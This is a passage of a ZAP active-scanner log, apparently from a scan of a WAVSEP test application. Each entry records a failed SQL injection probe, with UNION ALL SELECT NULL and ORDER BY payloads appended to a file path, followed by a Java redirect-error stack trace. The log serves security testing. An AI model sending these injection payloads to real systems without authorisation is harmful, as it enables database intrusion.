org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962913 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962915 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962916 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962917 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962918 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8962919 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' ORDER BY 2058-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' ORDER BY 2058-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8962921 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962922 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962923 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962925 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962927 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962929 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962930 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 